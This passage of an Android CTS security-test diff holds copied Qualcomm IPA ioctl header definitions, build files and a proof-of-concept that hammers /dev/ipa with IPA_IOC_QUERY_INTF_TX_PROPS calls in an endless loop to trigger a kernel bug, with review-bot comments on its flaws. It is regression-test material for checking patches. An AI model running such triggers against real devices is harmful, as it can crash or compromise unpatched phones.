+ WLAN_HDR_ATTRIB_MAC_ADDR,
+ WLAN_HDR_ATTRIB_STA_ID
+};
+
+/**
+ * struct ipa_wlan_hdr_attrib_val - header attribute value
+ * @attrib_type: type of attribute
+ * @offset: offset of attribute within header
+ * @u.mac_addr: mac address
+ * @u.sta_id: station id
+ */
+struct ipa_wlan_hdr_attrib_val {
+ enum ipa_wlan_hdr_attrib_type attrib_type;
+ uint8_t offset;
+ union {
+ uint8_t mac_addr[IPA_MAC_ADDR_SIZE];
+ uint8_t sta_id;
+ } u;
+};
+
+/**
+ * struct ipa_wlan_msg_ex - To hold information about wlan client
+ * @name: name of the wlan interface
+ * @num_of_attribs: number of attributes
+ * @attrib_val: holds attribute values
+ *
+ * wlan drivers need to pass name of wlan iface and mac address
+ * of wlan client or station id along with ipa_wlan_event,
+ * whenever a wlan client is connected/disconnected/moved to
+ * power save/come out of power save
+ */
+struct ipa_wlan_msg_ex {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint8_t num_of_attribs;
+ struct ipa_wlan_hdr_attrib_val attribs[0];
+};
+
+struct ipa_ecm_msg {
+ char name[IPA_RESOURCE_NAME_MAX];
+ int ifindex;
+};
+
+/**
+ * struct ipa_wan_msg - To hold information about wan client
+ * @name: name of the wan interface
+ *
+ * CnE need to pass the name of default wan iface when connected/disconnected.
+ * netmgr need to pass the name of wan eMBMS iface when connected.
+ */
+struct ipa_wan_msg {
+ char upstream_ifname[IPA_RESOURCE_NAME_MAX];
+ char tethered_ifname[IPA_RESOURCE_NAME_MAX];
+ enum ipa_ip_type ip;
+};
+
+/**
+ * struct ipa_ioc_rm_dependency - parameters for add/delete dependency
+ * @resource_name: name of dependent resource
+ * @depends_on_name: name of its dependency
+ */
+struct ipa_ioc_rm_dependency {
+ enum ipa_rm_resource_name resource_name;
+ enum ipa_rm_resource_name depends_on_name;
+};
+
+struct ipa_ioc_generate_flt_eq {
+ enum ipa_ip_type ip;
+ struct ipa_rule_attrib attrib;
+ struct ipa_ipfltri_rule_eq eq_attrib;
+};
+
+/**
+ * struct ipa_ioc_write_qmapid - to write mux id to endpoint meta register
+ * @mux_id: mux id of wan
+ */
+struct ipa_ioc_write_qmapid {
+ enum ipa_client_type client;
+ uint8_t qmap_id;
+};
+
+enum ipacm_client_enum {
+ IPACM_CLIENT_USB = 1,
+ IPACM_CLIENT_WLAN,
+ IPACM_CLIENT_MAX
+};
+/**
+ * actual IOCTLs supported by IPA driver
+ */
+#define IPA_IOC_ADD_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR, \
+ struct ipa_ioc_add_hdr *)
+#define IPA_IOC_DEL_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR, \
+ struct ipa_ioc_del_hdr *)
+#define IPA_IOC_ADD_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE, \
+ struct ipa_ioc_add_rt_rule *)
+#define IPA_IOC_ADD_RT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_RT_RULE_AFTER, \
+ struct ipa_ioc_add_rt_rule_after *)
+#define IPA_IOC_DEL_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_RT_RULE, \
+ struct ipa_ioc_del_rt_rule *)
+#define IPA_IOC_ADD_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE, \
+ struct ipa_ioc_add_flt_rule *)
+#define IPA_IOC_ADD_FLT_RULE_AFTER _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_FLT_RULE_AFTER, \
+ struct ipa_ioc_add_flt_rule_after *)
+#define IPA_IOC_DEL_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_FLT_RULE, \
+ struct ipa_ioc_del_flt_rule *)
+#define IPA_IOC_COMMIT_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_COMMIT_HDR)
+#define IPA_IOC_RESET_HDR _IO(IPA_IOC_MAGIC,\
+ IPA_IOCTL_RESET_HDR)
+#define IPA_IOC_COMMIT_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_RT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_RT, \
+ enum ipa_ip_type)
+#define IPA_IOC_COMMIT_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COMMIT_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_RESET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RESET_FLT, \
+ enum ipa_ip_type)
+#define IPA_IOC_DUMP _IO(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DUMP)
+#define IPA_IOC_GET_RT_TBL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_RT_TBL, \
+ struct ipa_ioc_get_rt_tbl *)
+#define IPA_IOC_PUT_RT_TBL _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_RT_TBL, \
+ uint32_t)
+#define IPA_IOC_COPY_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_COPY_HDR, \
+ struct ipa_ioc_copy_hdr *)
+#define IPA_IOC_QUERY_INTF _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF, \
+ struct ipa_ioc_query_intf *)
+#define IPA_IOC_QUERY_INTF_TX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_TX_PROPS, \
+ struct ipa_ioc_query_intf_tx_props *)
+#define IPA_IOC_QUERY_INTF_RX_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_RX_PROPS, \
+ struct ipa_ioc_query_intf_rx_props *)
+#define IPA_IOC_QUERY_INTF_EXT_PROPS _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_INTF_EXT_PROPS, \
+ struct ipa_ioc_query_intf_ext_props *)
+#define IPA_IOC_GET_HDR _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HDR, \
+ struct ipa_ioc_get_hdr *)
+#define IPA_IOC_PUT_HDR _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PUT_HDR, \
+ uint32_t)
+#define IPA_IOC_ALLOC_NAT_MEM _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ALLOC_NAT_MEM, \
+ struct ipa_ioc_nat_alloc_mem *)
+#define IPA_IOC_V4_INIT_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_INIT_NAT, \
+ struct ipa_ioc_v4_nat_init *)
+#define IPA_IOC_NAT_DMA _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NAT_DMA, \
+ struct ipa_ioc_nat_dma_cmd *)
+#define IPA_IOC_V4_DEL_NAT _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_V4_DEL_NAT, \
+ struct ipa_ioc_v4_nat_del *)
+#define IPA_IOC_GET_NAT_OFFSET _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_NAT_OFFSET, \
+ uint32_t *)
+#define IPA_IOC_SET_FLT _IOW(IPA_IOC_MAGIC, \
+ IPA_IOCTL_SET_FLT, \
+ uint32_t)
+#define IPA_IOC_PULL_MSG _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_PULL_MSG, \
+ struct ipa_msg_meta *)
+#define IPA_IOC_RM_ADD_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_ADD_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_RM_DEL_DEPENDENCY _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_RM_DEL_DEPENDENCY, \
+ struct ipa_ioc_rm_dependency *)
+#define IPA_IOC_GENERATE_FLT_EQ _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GENERATE_FLT_EQ, \
+ struct ipa_ioc_generate_flt_eq *)
+#define IPA_IOC_QUERY_EP_MAPPING _IOR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_EP_MAPPING, \
+ uint32_t)
+#define IPA_IOC_QUERY_RT_TBL_INDEX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_QUERY_RT_TBL_INDEX, \
+ struct ipa_ioc_get_rt_tbl_indx *)
+#define IPA_IOC_WRITE_QMAPID _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_WRITE_QMAPID, \
+ struct ipa_ioc_write_qmapid *)
+#define IPA_IOC_MDFY_FLT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_FLT_RULE, \
+ struct ipa_ioc_mdfy_flt_rule *)
+#define IPA_IOC_MDFY_RT_RULE _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_MDFY_RT_RULE, \
+ struct ipa_ioc_mdfy_rt_rule *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_ADD _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD, \
+ struct ipa_wan_msg *)
+
+#define IPA_IOC_NOTIFY_WAN_UPSTREAM_ROUTE_DEL _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_NOTIFY_WAN_EMBMS_CONNECTED _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED, \
+ struct ipa_wan_msg *)
+#define IPA_IOC_ADD_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_ADD_HDR_PROC_CTX, \
+ struct ipa_ioc_add_hdr_proc_ctx *)
+#define IPA_IOC_DEL_HDR_PROC_CTX _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_DEL_HDR_PROC_CTX, \
+ struct ipa_ioc_del_hdr_proc_ctx *)
+
+#define IPA_IOC_GET_HW_VERSION _IOWR(IPA_IOC_MAGIC, \
+ IPA_IOCTL_GET_HW_VERSION, \
+ enum ipa_hw_type *)
+
+/*
+ * unique magic number of the Tethering bridge ioctls
+ */
+#define TETH_BRIDGE_IOC_MAGIC 0xCE
+
+/*
+ * Ioctls supported by Tethering bridge driver
+ */
+#define TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE 0
+#define TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS 1
+#define TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS 2
+#define TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES 3
+#define TETH_BRIDGE_IOCTL_MAX 4
+
+
+/**
+ * enum teth_link_protocol_type - link protocol (IP / Ethernet)
+ */
+enum teth_link_protocol_type {
+ TETH_LINK_PROTOCOL_IP,
+ TETH_LINK_PROTOCOL_ETHERNET,
+ TETH_LINK_PROTOCOL_MAX,
+};
+
+/**
+ * enum teth_aggr_protocol_type - Aggregation protocol (MBIM / TLP)
+ */
+enum teth_aggr_protocol_type {
+ TETH_AGGR_PROTOCOL_NONE,
+ TETH_AGGR_PROTOCOL_MBIM,
+ TETH_AGGR_PROTOCOL_TLP,
+ TETH_AGGR_PROTOCOL_MAX,
+};
+
+/**
+ * struct teth_aggr_params_link - Aggregation parameters for uplink/downlink
+ * @aggr_prot: Aggregation protocol (MBIM / TLP)
+ * @max_transfer_size_byte: Maximal size of aggregated packet in bytes.
+ * Default value is 16*1024.
+ * @max_datagrams: Maximal number of IP packets in an aggregated
+ * packet. Default value is 16
+ */
+struct teth_aggr_params_link {
+ enum teth_aggr_protocol_type aggr_prot;
+ uint32_t max_transfer_size_byte;
+ uint32_t max_datagrams;
+};
+
+
+/**
+ * struct teth_aggr_params - Aggregation parmeters
+ * @ul: Uplink parameters
+ * @dl: Downlink parmaeters
+ */
+struct teth_aggr_params {
+ struct teth_aggr_params_link ul;
+ struct teth_aggr_params_link dl;
+};
+
+/**
+ * struct teth_aggr_capabilities - Aggregation capabilities
+ * @num_protocols: Number of protocols described in the array
+ * @prot_caps[]: Array of aggregation capabilities per protocol
+ */
+struct teth_aggr_capabilities {
+ uint16_t num_protocols;
+ struct teth_aggr_params_link prot_caps[0];
+};
+
+/**
+ * struct teth_ioc_set_bridge_mode
+ * @link_protocol: link protocol (IP / Ethernet)
+ * @lcid: logical channel number
+ */
+struct teth_ioc_set_bridge_mode {
+ enum teth_link_protocol_type link_protocol;
+ uint16_t lcid;
+};
+
+/**
+ * struct teth_ioc_set_aggr_params
+ * @aggr_params: Aggregation parmeters
+ * @lcid: logical channel number
+ */
+struct teth_ioc_aggr_params {
+ struct teth_aggr_params aggr_params;
+ uint16_t lcid;
+};
+
+
+#define TETH_BRIDGE_IOC_SET_BRIDGE_MODE _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_BRIDGE_MODE, \
+ struct teth_ioc_set_bridge_mode *)
+#define TETH_BRIDGE_IOC_SET_AGGR_PARAMS _IOW(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_SET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_PARAMS _IOR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_PARAMS, \
+ struct teth_ioc_aggr_params *)
+#define TETH_BRIDGE_IOC_GET_AGGR_CAPABILITIES _IOWR(TETH_BRIDGE_IOC_MAGIC, \
+ TETH_BRIDGE_IOCTL_GET_AGGR_CAPABILITIES, \
+ struct teth_aggr_capabilities *)
+
+/*
+ * unique magic number of the ODU bridge ioctls
+ */
+#define ODU_BRIDGE_IOC_MAGIC 0xCD
+
+/*
+ * Ioctls supported by ODU bridge driver
+ */
+#define ODU_BRIDGE_IOCTL_SET_MODE 0
+#define ODU_BRIDGE_IOCTL_SET_LLV6_ADDR 1
+#define ODU_BRIDGE_IOCTL_MAX 2
+
+/**
+ * enum odu_bridge_mode - bridge mode
+ * (ROUTER MODE / BRIDGE MODE)
+ */
+enum odu_bridge_mode {
+ ODU_BRIDGE_MODE_ROUTER,
+ ODU_BRIDGE_MODE_BRIDGE,
+ ODU_BRIDGE_MODE_MAX,
+};
+
+#define ODU_BRIDGE_IOC_SET_MODE _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_MODE, \
+ enum odu_bridge_mode)
+
+#define ODU_BRIDGE_IOC_SET_LLV6_ADDR _IOW(ODU_BRIDGE_IOC_MAGIC, \
+ ODU_BRIDGE_IOCTL_SET_LLV6_ADDR, \
+ struct in6_addr *)
+
+#endif /* _UAPI_MSM_IPA_H_ */
diff --git a/hostsidetests/security/securityPatch/Bug-35047217/poc.cpp b/hostsidetests/security/securityPatch/Bug-35047217/poc.cpp
new file mode 100644
index 0000000..34adca0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047217/poc.cpp
@@ -0,0 +1,65 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions
+ * and limitations under the License.
+ **/
+
+
+#define _GNU_SOURCE
+
+#include <pthread.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include "local_poc.h"
+#include <unistd.h>
+#include <stdio.h>
+
+struct ipa_ioc_query_intf_tx_props_2 {
+ char name[IPA_RESOURCE_NAME_MAX];
+ uint32_t num_tx_props;
+ struct ipa_ioc_tx_intf_prop tx[2];
+};
+
+int main() {
+
+ int fd = open("/dev/ipa", O_RDWR);
+
+ struct ipa_ioc_query_intf query_intf;
+ strlcpy(&(query_intf.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+
+ int result = ioctl(fd, IPA_IOC_QUERY_INTF, &query_intf);
+
+ ipa_ioc_query_intf_tx_props_2 tx_props_2;
+ memset(&tx_props_2, 0, sizeof(tx_props_2));
+ strlcpy(&(tx_props_2.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ tx_props_2.num_tx_props = 2;
+
+ int result2 = ioctl(fd, IPA_IOC_QUERY_INTF_TX_PROPS, &tx_props_2);
+
+ while (true) {
+ ipa_ioc_query_intf_tx_props tx_props;
+ memset(&tx_props, 0, sizeof(tx_props));
+ strlcpy(&(tx_props.name[0]), "rmnet_data0", IPA_RESOURCE_NAME_MAX);
+ tx_props.num_tx_props = 0;
+
+ int result3 = ioctl(fd, IPA_IOC_QUERY_INTF_TX_PROPS, &tx_props);
+
+ usleep(10000);
+ }
+ return 0;
+}
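Review bot: The result of `open("/dev/ipa", O_RDWR)` at the top of `main` is never checked, so on a device where the node is absent or not accessible every later ioctl fails on fd -1 and the program still spins in `while (true)`; such a run says nothing about whether the kernel is patched. Add `if (fd < 0) { perror("open /dev/ipa"); return 1; }` directly after the open. `query_intf` is passed to `IPA_IOC_QUERY_INTF` with only `name` set, unlike the two tx_props structs, which are zeroed first; `memset(&query_intf, 0, sizeof(query_intf));` before the `strlcpy` keeps uninitialised stack bytes out of the request. The loop has no exit, so `return 0` is unreachable and the harness has to kill the process; a bounded iteration count would let the binary report its own result. `result`, `result2` and `result3` are also never read.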
diff --git a/hostsidetests/security/securityPatch/Bug-35047780/Android.mk b/hostsidetests/security/securityPatch/Bug-35047780/Android.mk
new file mode 100644
index 0000000..d4c91bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047780/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35047780
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
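Review bot: The `CFLAGS +=` and `LDFLAGS +=` lines near the end of this file set plain make variables, and nothing visible here feeds them into the module, so `-Wall`, `-D_FORTIFY_SOURCE=2`, `-fPIE` and `-Iinclude` are probably not applied when `poc.cpp` is compiled. The Android make build takes per-module flags from `LOCAL_CFLAGS`, `LOCAL_LDFLAGS` and `LOCAL_C_INCLUDES`; the equivalent would start `LOCAL_CFLAGS += -Wall -W -g -O2 -D_FORTIFY_SOURCE=2`. Some of the listed warnings (`-Wstrict-prototypes`, `-Wnested-externs`, `-Wdeclaration-after-statement`) are C-only and have no use for a `.cpp` source, so they can be dropped when the flags are moved.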
diff --git a/hostsidetests/security/securityPatch/Bug-35047780/local_poc.h b/hostsidetests/security/securityPatch/Bug-35047780/local_poc.h
new file mode 100644
index 0000000..106681c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35047780/local_poc.h
@@ -0,0 +1,1759 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _UAPI_MSM_IPA_H_
+#define _UAPI_MSM_IPA_H_
+
+#ifndef __KERNEL__
+#include <stdint.h>
+#include <stddef.h>
+#include <sys/stat.h>
+#endif
+#include <linux/ioctl.h>
+#include <linux/types.h>
+#include <linux/if_ether.h>
+
+/**
+ * unique magic number of the IPA device
+ */
+#define IPA_IOC_MAGIC 0xCF
+
+/**
+ * name of the default routing tables for v4 and v6
+ */
+#define IPA_DFLT_RT_TBL_NAME "ipa_dflt_rt"
+
+/**
+ * the commands supported by IPA driver
+ */
+#define IPA_IOCTL_ADD_HDR 0
+#define IPA_IOCTL_DEL_HDR 1
+#define IPA_IOCTL_ADD_RT_RULE 2
+#define IPA_IOCTL_DEL_RT_RULE 3
+#define IPA_IOCTL_ADD_FLT_RULE 4
+#define IPA_IOCTL_DEL_FLT_RULE 5
+#define IPA_IOCTL_COMMIT_HDR 6
+#define IPA_IOCTL_RESET_HDR 7
+#define IPA_IOCTL_COMMIT_RT 8
+#define IPA_IOCTL_RESET_RT 9
+#define IPA_IOCTL_COMMIT_FLT 10
+#define IPA_IOCTL_RESET_FLT 11
+#define IPA_IOCTL_DUMP 12
+#define IPA_IOCTL_GET_RT_TBL 13
+#define IPA_IOCTL_PUT_RT_TBL 14
+#define IPA_IOCTL_COPY_HDR 15
+#define IPA_IOCTL_QUERY_INTF 16
+#define IPA_IOCTL_QUERY_INTF_TX_PROPS 17
+#define IPA_IOCTL_QUERY_INTF_RX_PROPS 18
+#define IPA_IOCTL_GET_HDR 19
+#define IPA_IOCTL_PUT_HDR 20
+#define IPA_IOCTL_SET_FLT 21
+#define IPA_IOCTL_ALLOC_NAT_MEM 22
+#define IPA_IOCTL_V4_INIT_NAT 23
+#define IPA_IOCTL_NAT_DMA 24
+#define IPA_IOCTL_V4_DEL_NAT 26
+#define IPA_IOCTL_PULL_MSG 27
+#define IPA_IOCTL_GET_NAT_OFFSET 28
+#define IPA_IOCTL_RM_ADD_DEPENDENCY 29
+#define IPA_IOCTL_RM_DEL_DEPENDENCY 30
+#define IPA_IOCTL_GENERATE_FLT_EQ 31
+#define IPA_IOCTL_QUERY_INTF_EXT_PROPS 32
+#define IPA_IOCTL_QUERY_EP_MAPPING 33
+#define IPA_IOCTL_QUERY_RT_TBL_INDEX 34
+#define IPA_IOCTL_WRITE_QMAPID 35
+#define IPA_IOCTL_MDFY_FLT_RULE 36
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_ADD 37
+#define IPA_IOCTL_NOTIFY_WAN_UPSTREAM_ROUTE_DEL 38
+#define IPA_IOCTL_NOTIFY_WAN_EMBMS_CONNECTED 39
+#define IPA_IOCTL_ADD_HDR_PROC_CTX 40
+#define IPA_IOCTL_DEL_HDR_PROC_CTX 41
+#define IPA_IOCTL_MDFY_RT_RULE 42
+#define IPA_IOCTL_ADD_RT_RULE_AFTER 43
+#define IPA_IOCTL_ADD_FLT_RULE_AFTER 44
+#define IPA_IOCTL_GET_HW_VERSION 45
+#define IPA_IOCTL_MAX 46
+
+/**
+ * max size of the header to be inserted
+ */
+#define IPA_HDR_MAX_SIZE 64
+
+/**
+ * max size of the name of the resource (routing table, header)
+ */
+#define IPA_RESOURCE_NAME_MAX 32
+
+/**
+ * max number of interface properties
+ */
+#define IPA_NUM_PROPS_MAX 35
+
+/**
+ * size of the mac address
+ */
+#define IPA_MAC_ADDR_SIZE 6
+
+/**
+ * max number of mbim streams
+ */
+#define IPA_MBIM_MAX_STREAM_NUM 8
+
+/**
+ * the attributes of the rule (routing or filtering)
+ */
+#define IPA_FLT_TOS (1ul << 0)
+#define IPA_FLT_PROTOCOL (1ul << 1)
+#define IPA_FLT_SRC_ADDR (1ul << 2)
+#define IPA_FLT_DST_ADDR (1ul << 3)
+#define IPA_FLT_SRC_PORT_RANGE (1ul << 4)
+#define IPA_FLT_DST_PORT_RANGE (1ul << 5)
+#define IPA_FLT_TYPE (1ul << 6)
+#define IPA_FLT_CODE (1ul << 7)
+#define IPA_FLT_SPI (1ul << 8)
+#define IPA_FLT_SRC_PORT (1ul << 9)
+#define IPA_FLT_DST_PORT (1ul << 10)
+#define IPA_FLT_TC (1ul << 11)
+#define IPA_FLT_FLOW_LABEL (1ul << 12)
+#define IPA_FLT_NEXT_HDR (1ul << 13)
+#define IPA_FLT_META_DATA (1ul << 14)
+#define IPA_FLT_FRAGMENT (1ul << 15)
+#define IPA_FLT_TOS_MASKED (1ul << 16)
+#define IPA_FLT_MAC_SRC_ADDR_ETHER_II (1ul << 17)
+#define IPA_FLT_MAC_DST_ADDR_ETHER_II (1ul << 18)
+#define IPA_FLT_MAC_SRC_ADDR_802_3 (1ul << 19)
+#define IPA_FLT_MAC_DST_ADDR_802_3 (1ul << 20)
+#define IPA_FLT_MAC_ETHER_TYPE (1ul << 21)
+
+/**
+ * enum ipa_client_type - names for the various IPA "clients"
+ * these are from the perspective of the clients, for e.g.
+ * HSIC1_PROD means HSIC client is the producer and IPA is the
+ * consumer
+ */
+enum ipa_client_type {
+ IPA_CLIENT_PROD,
+ IPA_CLIENT_HSIC1_PROD = IPA_CLIENT_PROD,
+ IPA_CLIENT_WLAN1_PROD,
+ IPA_CLIENT_HSIC2_PROD,
+ IPA_CLIENT_USB2_PROD,
+ IPA_CLIENT_HSIC3_PROD,
+ IPA_CLIENT_USB3_PROD,
+ IPA_CLIENT_HSIC4_PROD,
+ IPA_CLIENT_USB4_PROD,
+ IPA_CLIENT_HSIC5_PROD,
+ IPA_CLIENT_USB_PROD,
+ IPA_CLIENT_A5_WLAN_AMPDU_PROD,
+ IPA_CLIENT_A2_EMBEDDED_PROD,
+ IPA_CLIENT_A2_TETHERED_PROD,
+ IPA_CLIENT_APPS_LAN_WAN_PROD,
+ IPA_CLIENT_APPS_CMD_PROD,
+ IPA_CLIENT_ODU_PROD,
+ IPA_CLIENT_MHI_PROD,
+ IPA_CLIENT_Q6_LAN_PROD,
+ IPA_CLIENT_Q6_WAN_PROD,
+ IPA_CLIENT_Q6_CMD_PROD,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_PROD,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_PROD,
+ IPA_CLIENT_Q6_DECOMP_PROD,
+ IPA_CLIENT_Q6_DECOMP2_PROD,
+ IPA_CLIENT_UC_USB_PROD,
+
+ /* Below PROD client type is only for test purpose */
+ IPA_CLIENT_TEST_PROD,
+ IPA_CLIENT_TEST1_PROD,
+ IPA_CLIENT_TEST2_PROD,
+ IPA_CLIENT_TEST3_PROD,
+ IPA_CLIENT_TEST4_PROD,
+
+ IPA_CLIENT_CONS,
+ IPA_CLIENT_HSIC1_CONS = IPA_CLIENT_CONS,
+ IPA_CLIENT_WLAN1_CONS,
+ IPA_CLIENT_HSIC2_CONS,
+ IPA_CLIENT_USB2_CONS,
+ IPA_CLIENT_WLAN2_CONS,
+ IPA_CLIENT_HSIC3_CONS,
+ IPA_CLIENT_USB3_CONS,
+ IPA_CLIENT_WLAN3_CONS,
+ IPA_CLIENT_HSIC4_CONS,
+ IPA_CLIENT_USB4_CONS,
+ IPA_CLIENT_WLAN4_CONS,
+ IPA_CLIENT_HSIC5_CONS,
+ IPA_CLIENT_USB_CONS,
+ IPA_CLIENT_USB_DPL_CONS,
+ IPA_CLIENT_A2_EMBEDDED_CONS,
+ IPA_CLIENT_A2_TETHERED_CONS,
+ IPA_CLIENT_A5_LAN_WAN_CONS,
+ IPA_CLIENT_APPS_LAN_CONS,
+ IPA_CLIENT_APPS_WAN_CONS,
+ IPA_CLIENT_ODU_EMB_CONS,
+ IPA_CLIENT_ODU_TETH_CONS,
+ IPA_CLIENT_MHI_CONS,
+ IPA_CLIENT_Q6_LAN_CONS,
+ IPA_CLIENT_Q6_WAN_CONS,
+ IPA_CLIENT_Q6_DUN_CONS,
+ IPA_CLIENT_MEMCPY_DMA_SYNC_CONS,
+ IPA_CLIENT_MEMCPY_DMA_ASYNC_CONS,
+ IPA_CLIENT_Q6_DECOMP_CONS,
+ IPA_CLIENT_Q6_DECOMP2_CONS,
+ IPA_CLIENT_Q6_LTE_WIFI_AGGR_CONS,
+ /* Below CONS client type is only for test purpose */
+ IPA_CLIENT_TEST_CONS,
+ IPA_CLIENT_TEST1_CONS,
+ IPA_CLIENT_TEST2_CONS,
+ IPA_CLIENT_TEST3_CONS,
+ IPA_CLIENT_TEST4_CONS,
+
+ IPA_CLIENT_MAX,
+};
+
+#define IPA_CLIENT_IS_APPS_CONS(client) \
+ ((client) == IPA_CLIENT_APPS_LAN_CONS || \
